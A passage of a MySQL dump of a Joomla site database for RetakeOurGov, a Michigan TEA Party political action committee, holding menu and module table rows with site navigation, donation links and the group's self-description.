00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(47,'mainmenu','Menu Styles','menu-styles-mainmenu-47','index.php?option=com_content&view=article&id=17','component',1,48,20,1,5,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(48,'mainmenu','Features','features-mainmenu-48','index.php?option=com_content&view=article&id=18','component',0,0,20,0,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(49,'mainmenu','Template Parameters','template-parameters-mainmenu-49','index.php?option=com_content&view=article&id=19','component',1,48,20,1,1,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(50,'mainmenu','Image Slideshow','image-slideshow-mainmenu-50','index.php?option=com_content&view=article&id=20','component',0,0,20,0,4,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(51,'mainmenu','Make a Contribution','contributions','https://secure.piryx.com/donate/ZolDqAzM/Stop-Socialism-B4itz2L8/','url',1,57,0,1,3,0,'0000-00-00 00:00:00',0,2,0,0,'menu_image=-1\n\n',0,0,0),(53,'mainmenu','Colors Variation','colors-variation-mainmenu-53','index.php?option=com_content&view=article&id=16','component',1,48,20,1,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(54,'mainmenu','Font Styles','font-styles-mainmenu-54','index.php?option=com_content&view=article&id=22','component',1,48,20,1,3,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(55,'mainmenu','Extended Styles','extended-styles-mainmenu-55','index.php?option=com_content&view=article&id=23','component',1,48,20,1,8,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(56,'mainmenu','Petition - MI Constitution','petition-mi-constitution','http://nsconstruct.com/retakeourgov/index.php?option=com_content&id=39&Itemid=59','url',1,0,0,0,5,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\n\n',0,0,0),(57,'mainmenu','Next Step','next-step-mainmenu-57','index.php?option=com_content&view=article&id=48','component',1,0,20,0,6,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=1\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(58,'mainmenu','Resources','resources','index.php?option=com_content&view=article&id=47','component',1,0,20,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=1\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(59,'mainmenu','Popular Extensions','popular-extensions-mainmenu-59','index.php?option=com_content&view=article&id=23','component',0,58,20,1,4,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(61,'mainmenu','Information','information','index.php?option=com_content&view=article&id=26','component',1,58,20,1,5,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=1\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(62,'mainmenu','News Feeds','news-feeds-mainmenu-62','index.php?option=com_newsfeeds&view=categories','component',0,61,11,2,5,0,'0000-00-00 00:00:00',0,0,0,0,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(63,'mainmenu','Join Us','join-us','index.php?option=com_artforms&formid=2','url',1,57,0,1,1,0,'0000-00-00 00:00:00',0,0,0,3,'menu_image=-1\n\n',0,0,0),(64,'mainmenu','Volunteer','volunteer','http://nsconstruct.com/retakeourgov/index.php?option=com_content&id=40&Itemid=59','url',1,57,0,1,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\n\n',0,0,0),(65,'tfeatures','Typography','typography-mainmenu-44','index.php?option=com_content&view=article&id=12','component',0,0,20,0,11,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(66,'tfeatures','Layout','layout-mainmenu-45','index.php?option=com_content&view=article&id=14','component',0,0,20,0,8,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(67,'tfeatures','Module Styles','module-styles-mainmenu-46','index.php?option=com_content&view=article&id=15','component',0,0,20,0,10,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(68,'tfeatures','Menu Styles','menu-styles-mainmenu-47','index.php?option=com_content&view=article&id=17','component',0,0,20,0,9,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(69,'tfeatures','Template Parameters','template-parameters-mainmenu-49','index.php?option=com_content&view=article&id=19','component',0,0,20,0,5,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(70,'tfeatures','Colors Variation','colors-variation-mainmenu-53','index.php?option=com_content&view=article&id=16','component',0,0,20,0,6,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(71,'tfeatures','Font Styles','font-styles-mainmenu-54','index.php?option=com_content&view=article&id=22','component',0,0,20,0,7,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(72,'tfeatures','Extended Styles','extended-styles-mainmenu-55','index.php?option=com_content&view=article&id=23','component',0,0,20,0,12,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(103,'bottommenu','Validate XTHML','xthml-valid','http://validator.w3.org/check?verbose=1&uri=http%3A%2F%2Fdemo.joomlashine.com%2Fjoomla-templates%2Fjsn_epic%2Fj15%2Findex.php','url',0,0,0,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\n\n',0,0,0),(107,'bottommenu','Download JSN Epic Free','download-jsn-epic-free','http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html','url',-2,0,0,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'menu_image=-1\n\n',0,0,0),(106,'bottommenu','Download JSN Epic','download-jsn-epic','http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html','url',0,0,0,0,5,0,'0000-00-00 00:00:00',0,0,0,3,'menu_image=-1\n\n',0,0,0),(105,'bottommenu','Compare Free - PRO','compare-free-and-pro','http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html','url',-2,0,0,0,4,0,'0000-00-00 00:00:00',0,0,0,3,'menu_image=-1\n\n',0,0,0),(104,'bottommenu','Validate CSS','css-valid','http://jigsaw.w3.org/css-validator/validator?profile=css21&warning=0&uri=http%3A%2F%2Fdemo.joomlashine.com%2Fjoomla-templates%2Fjsn_epic%2Fj15%2Findex.php','url',0,0,0,0,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\n\n',0,0,0),(113,'bottommenu','Contribute','make-a-contribution','https://secure.piryx.com/donate/ZolDqAzM/Stop-Socialism-B4itz2L8/','url',1,0,0,0,6,0,'0000-00-00 00:00:00',0,2,0,0,'menu_image=-1\n\n',0,0,0),(109,'tfeatures','FAQ on PAC','faq-on-pac','index.php?option=com_content&view=article&id=42','component',1,0,20,0,14,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(108,'tfeatures','Join Us','join-us','http://nsconstruct.com/retakeourgov/index.php?option=com_user&view=register','url',0,0,0,0,13,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\n\n',0,0,0),(110,'tfeatures','In the News','in-the-news','index.php?option=com_content&view=article&id=43','component',1,0,20,0,15,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(111,'tfeatures','Other Groups','other-groups','index.php?option=com_weblinks&view=categories','component',1,0,4,0,16,0,'0000-00-00 00:00:00',0,0,0,0,'image=-1\nimage_align=right\nshow_feed_link=1\nshow_comp_description=\ncomp_description=Other Michigan TEA party groups located near RetakeOurGov.  Don\'t see your group listed? Click on Contact Us at the bottom of the page to send us an email message.\nshow_link_hits=\nshow_link_description=\nshow_other_cats=\nshow_headings=\ntarget=\nlink_icons=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(112,'tfeatures','Petition - MI Constitution','petition-mi-constitution','index.php?option=com_content&view=article&id=39','component',1,0,20,0,17,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(114,'mainmenu','Events Calendar','events-calendar','index.php?option=com_content&view=article&id=45','component',1,58,20,1,2,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=0\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(115,'bottommenu','Contact Us','contact-us','index.php?option=com_contact&view=category&catid=12','component',1,0,7,0,8,0,'0000-00-00 00:00:00',0,0,0,0,'display_num=20\nimage=-1\nimage_align=right\nshow_limit=0\nshow_feed_link=1\ncontact_icons=\nicon_address=\nicon_email=\nicon_telephone=\nicon_mobile=\nicon_fax=\nicon_misc=\nshow_headings=\nshow_position=\nshow_email=\nshow_telephone=\nshow_mobile=\nshow_fax=\nallow_vcard=\nbanned_email=\nbanned_subject=\nbanned_text=\nvalidate_session=\ncustom_reply=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(116,'bottommenu','Calendar','events','http://www.nsconstruct.com/retakeourgov/index.php?option=com_jevents&Itemid=114&task=month.calendar&day=11&month=06&year=2010','url',1,0,0,0,7,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\n\n',0,0,0),(117,'tfeatures','Prior Events','events','index.php?option=com_content&view=article&id=46','component',1,0,20,0,18,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(118,'mainmenu','Events Throughout MI','events-throughout-mi','index.php?option=com_weblinks&view=category&id=21','component',1,58,4,1,3,0,'0000-00-00 00:00:00',0,1,0,0,'show_feed_link=1\nshow_comp_description=\ncomp_description=http://www.michiganactivists.com/\nshow_link_hits=\nshow_link_description=\nshow_other_cats=\nshow_headings=\ntarget=\nlink_icons=\npage_title=MI Activist Calendar\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(119,'tfeatures','Sign Up','sign-up','index.php?option=com_artforms&formid=1','artforms_form_link',0,0,0,0,4,0,'0000-00-00 00:00:00',0,0,0,0,'',0,0,0),(120,'tfeatures','Join RetakeOurgov','join-retakeourgov','index.php?option=com_artforms&formid=1','artforms_form_link',-2,0,0,0,2,0,'0000-00-00 00:00:00',0,0,0,0,'',0,0,0),(121,'tfeatures','Join RetakeOurGov','join-retakeourgov','index.php?option=com_artforms&formid=1','artforms_form_link',-2,0,0,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'',0,0,0),(122,'tfeatures','Join RetakeOurGov','join-retakeourgov','index.php?option=com_artforms&formid=2','artforms_form_link',1,0,0,0,1,0,'0000-00-00 00:00:00',0,0,0,0,'',0,0,0);
/*!40000 ALTER TABLE `jos_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_menu_types`
--

DROP TABLE IF EXISTS `jos_menu_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_menu_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `menutype` varchar(75) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `description` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_menu_types`
--

LOCK TABLES `jos_menu_types` WRITE;
/*!40000 ALTER TABLE `jos_menu_types` DISABLE KEYS */;
INSERT INTO `jos_menu_types` VALUES (1,'mainmenu','mainmenu',''),(2,'othermenu','othermenu',''),(3,'topmenu','topmenu',''),(4,'usermenu','usermenu',''),(5,'tfeatures','tfeatures','RetakeOurGov PAC'),(7,'bottommenu','bottommenu','');
/*!40000 ALTER TABLE `jos_menu_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_messages`
--

DROP TABLE IF EXISTS `jos_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_messages` (
  `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id_from` int(10) unsigned NOT NULL DEFAULT '0',
  `user_id_to` int(10) unsigned NOT NULL DEFAULT '0',
  `folder_id` int(10) unsigned NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` int(11) NOT NULL DEFAULT '0',
  `priority` int(1) unsigned NOT NULL DEFAULT '0',
  `subject` text NOT NULL,
  `message` text NOT NULL,
  PRIMARY KEY (`message_id`),
  KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_messages`
--

LOCK TABLES `jos_messages` WRITE;
/*!40000 ALTER TABLE `jos_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_messages_cfg`
--

DROP TABLE IF EXISTS `jos_messages_cfg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_messages_cfg` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) NOT NULL DEFAULT '',
  `cfg_value` varchar(255) NOT NULL DEFAULT '',
  UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_messages_cfg`
--

LOCK TABLES `jos_messages_cfg` WRITE;
/*!40000 ALTER TABLE `jos_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_migration_backlinks`
--

DROP TABLE IF EXISTS `jos_migration_backlinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_migration_backlinks` (
  `itemid` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `url` text NOT NULL,
  `sefurl` text NOT NULL,
  `newurl` text NOT NULL,
  PRIMARY KEY (`itemid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_migration_backlinks`
--

LOCK TABLES `jos_migration_backlinks` WRITE;
/*!40000 ALTER TABLE `jos_migration_backlinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_migration_backlinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_modules`
--

DROP TABLE IF EXISTS `jos_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_modules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` text NOT NULL,
  `content` text NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `position` varchar(50) DEFAULT NULL,
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) DEFAULT NULL,
  `numnews` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `iscore` tinyint(4) NOT NULL DEFAULT '0',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  `control` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`,`access`),
  KEY `newsfeeds` (`module`,`published`)
) ENGINE=MyISAM AUTO_INCREMENT=74 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_modules`
--

LOCK TABLES `jos_modules` WRITE;
/*!40000 ALTER TABLE `jos_modules` DISABLE KEYS */;
INSERT INTO `jos_modules` VALUES (65,'JSN ImageShow','',1,'promo',0,'0000-00-00 00:00:00',0,'mod_imageshow',0,0,0,'moduleclass_sfx=\nshowlist_id=4\nshowcase_id=2\nwidth=333\nheight=88\ncache=1\ncache_time=900\n\n',0,0,''),(2,'Login','',1,'login',0,'0000-00-00 00:00:00',1,'mod_login',0,0,1,'',1,1,''),(3,'Popular','',3,'cpanel',0,'0000-00-00 00:00:00',1,'mod_popular',0,2,1,'',0,1,''),(4,'Recent added Articles','',4,'cpanel',0,'0000-00-00 00:00:00',1,'mod_latest',0,2,1,'ordering=c_dsc\nuser_id=0\ncache=0\n\n',0,1,''),(5,'Menu Stats','',5,'cpanel',0,'0000-00-00 00:00:00',1,'mod_stats',0,2,1,'',0,1,''),(6,'Unread Messages','',1,'header',0,'0000-00-00 00:00:00',1,'mod_unread',0,2,1,'',1,1,''),(7,'Online Users','',2,'header',0,'0000-00-00 00:00:00',1,'mod_online',0,2,1,'',1,1,''),(8,'Toolbar','',1,'toolbar',0,'0000-00-00 00:00:00',1,'mod_toolbar',0,2,1,'',1,1,''),(9,'Quick Icons','',1,'icon',0,'0000-00-00 00:00:00',1,'mod_quickicon',0,2,1,'',1,1,''),(10,'Logged in Users','',2,'cpanel',0,'0000-00-00 00:00:00',1,'mod_logged',0,2,1,'',0,1,''),(11,'Footer','',0,'footer',0,'0000-00-00 00:00:00',1,'mod_footer',0,0,1,'',1,1,''),(12,'Admin Menu','',1,'menu',0,'0000-00-00 00:00:00',1,'mod_menu',0,2,1,'',0,1,''),(13,'Admin SubMenu','',1,'submenu',0,'0000-00-00 00:00:00',1,'mod_submenu',0,2,1,'',0,1,''),(14,'User Status','',1,'status',0,'0000-00-00 00:00:00',1,'mod_status',0,2,1,'',0,1,''),(15,'Title','',1,'title',0,'0000-00-00 00:00:00',1,'mod_title',0,2,1,'',0,1,''),(66,'Joomla! Security Newsfeed','',6,'cpanel',0,'0000-00-00 00:00:00',1,'mod_feed',0,0,1,'cache=1\ncache_time=15\nmoduleclass_sfx=\nrssurl=http://feeds.joomla.org/JoomlaSecurityNews\nrssrtl=0\nrsstitle=1\nrssdesc=0\nrssimage=1\nrssitems=1\nrssitemdesc=1\nword_count=0\n\n',0,1,''),(50,'Quick Start Guide','',10,'left',0,'0000-00-00 00:00:00',0,'mod_mostread',0,0,1,'moduleclass_sfx=-box box-green icon-article\nshow_front=1\ncount=10\ncatid=16\nsecid=\ncache=1\ncache_time=900\n\n',0,0,''),(49,'Buy JSN Epic','<p>JSN Epic template is distributed under 2 editions:</p>\r\n<p><strong>PRO</strong><br />\r\nPrice: <span style=\"color: #cc3333; font-weight: bold;\">US$29</span><br />\r\nIdeal for individuals who run their own website.</p>\r\n\r\n<p><strong>Developer</strong><br />\r\nPrice: <span style=\"color: #cc3333; font-weight: bold;\">US$59</span><br />\r\nPerfect for developers who create websites for clients.</p>\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" alt=\"buy-now\"/> </a>\r\n</p>',9,'left',0,'0000-00-00 00:00:00',0,'mod_custom',0,0,1,'moduleclass_sfx=-box box-yellow icon-star\n\n',0,0,''),(47,'Syndicate','',6,'left',0,'0000-00-00 00:00:00',0,'mod_syndicate',0,0,1,'cache=0\ntext=Feed Entries\nformat=rss\nmoduleclass_sfx=-plain icon-rss\n\n',0,0,''),(54,'Tree Menu','',8,'left',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,1,'menutype=\nmenu_style=list\nstartLevel=0\nendLevel=0\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=-treemenu\nmoduleclass_sfx=-box box-yellow\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',0,0,''),(69,'Events Calendar','',3,'left',0,'0000-00-00 00:00:00',1,'mod_jevents_cal',0,0,1,'inc_ec_css=1\ncache=1\nmoduleclass_sfx=\nallcats=1\ncatid0=0\ncatid1=0\ncatid2=0\ncatid3=0\ncatid4=0\nignorecatfilter=0\nignorefiltermodule=0\ntarget_itemid=114\nminical_showlink=1\nminical_prevyear=1\nminical_prevmonth=1\nminical_actmonth=1\nminical_actyear=1\nminical_nextmonth=1\nminical_nextyear=1\nminical_usedate=0\nmodcal_useLocalParam=0\nmodcal_DispLastMonth=NO\nmodcal_DispLastMonthDays=0\nmodcal_DispNextMonth=NO\nmodcal_DispNextMonthDays=0\nmodcal_LinkCloaking=0\n\n',0,0,''),(53,'Side menu','',4,'left',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,1,'menutype=\nmenu_style=list\nstartLevel=0\nendLevel=0\nshowAllChildren=1\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=-sidemenu\nmoduleclass_sfx=-box box-green\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',0,0,''),(31,'Banners','',1,'banner',62,'2010-06-13 21:22:28',1,'mod_banners',0,0,0,'target=1\ncount=1\ncid=0\ncatid=0\ntag_search=0\nordering=0\nheader_text=\nfooter_text=\nmoduleclass_sfx=\ncache=1\ncache_time=900\n\n',1,0,''),(32,'Div Menu','',1,'bottom',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,0,'menutype=bottommenu\nmenu_style=list\nstartLevel=0\nendLevel=1\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=0\ntag_id=\nclass_sfx=-divmenu\nmoduleclass_sfx=\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',0,0,''),(33,'Wrapper','',4,'user9',0,'0000-00-00 00:00:00',0,'mod_wrapper',0,0,1,'moduleclass_sfx=\nurl=\nscrolling=auto\nwidth=100%\nheight=200\nheight_auto=1\nadd=1',0,0,''),(34,'Welcome','<p style=\"TEXT-ALIGN: left\"><img src=\"images/gw.jpg\" border=\"0\" width=\"143\" height=\"168\" style=\"float: left; border: 0; margin-left: 13px; margin-right: 13px;\" /></p>\r\n<p style=\"TEXT-ALIGN: left\">RetakeOurGov is a TEA Party group with members throughout our great country.  We are based in Hartland, Michigan and as such our meetings are regularly attended by citizens from Genesee, Ingham, Livingston, Oakland, Washtenaw, and Wayne Counties.  We are also a registered Political Action Committee (PAC) with a nationwide focus, and are working with other groups to defeat candidates who seek to expand the Washington D.C. bureaucracy at the expense of hard-working Americans.  Come join us as we Retake Our Government.</p>\r\n<p style=\"TEXT-ALIGN: left\"> </p>\r\n<p style=\"text-align: center;\"> </p>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_artforms&amp;formid=2&amp;Itemid=122\"><img src=\"images/stories/signup.gif\" border=\"0\" /></a> <a href=\"https://secure.piryx.com/donate/ZolDqAzM/Stop-Socialism-B4itz2L8/\" target=\"_blank\"><img src=\"images/stories/donate144.gif\" border=\"0\" /></a></p>',0,'user1',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,1,'moduleclass_sfx=\n\n',0,0,''),(35,'About us','<p><strong>We’re RetakeOurGov, we’re a TEA party Political Action Committee, and we’re looking for people like you to join us.</strong></p>\r\n<ul>\r\n<li><em>We believe that Washington is too big, too arrogant and too unresponsive. </em></li>\r\n<li><em>We believe in restoring financial sanity and personal responsibility. </em></li>\r\n<li><em>We believe that it’s time to remove the  career politicians who don’t listen...<br /><strong>-</strong> Who tell us that they know better than we do what’s good for us<br /><strong>-</strong> Who ignore the will of the people<br /><strong>-</strong> Who are spending our children and grandchildren into economic slavery</em></li>\r\n</ul>',1,'user2',62,'2010-06-16 01:52:23',1,'mod_custom',0,0,1,'moduleclass_sfx=\n\n',0,0,''),(36,'Why did we form a PAC?','<p style=\"text-align: justify;\">Many citizens have the desire to help the TEA party movement, but not the time to help.  A PAC provides these citizens with an opportunity to contribute to the movement.  <a href=\"http://nsconstruct.com/retakeourgov/index.php?option=com_content&amp;view=article&amp;id=42&amp;Itemid=109\">Read more</a>.</p>',0,'user5',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,1,'moduleclass_sfx=-plain icon-settings\n\n',0,0,''),(68,'JEvents Legend','',12,'left',0,'0000-00-00 00:00:00',0,'mod_jevents_legend',0,0,1,'modlegend_inccss=1\nnonjeventsdisable=1\n',0,0,''),(37,'Why contribute to our PAC instead of giving directly to a candidate?','<p>Contributing to a PAC amplifies your voice by combining your funds with the funds of other like-minded individuals.  Contributions to RetakeOurGov PAC amplify your voice by directly opposing tax and spend career politicians while simultaneously growing the strength of the TEA Party movement.  <a href=\"http://nsconstruct.com/retakeourgov/index.php?option=com_content&amp;view=article&amp;id=42&amp;Itemid=109\">Read more</a>.</p>',0,'user7',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,1,'moduleclass_sfx=-plain icon-settings\n\n',0,0,''),(48,'Image Slideshow','<p><em>But a Constitution of Government once changed from Freedom, can never be restored. Liberty, once lost, is lost forever. --- <strong>John Adams, letter to Abigail Adams, July 17, 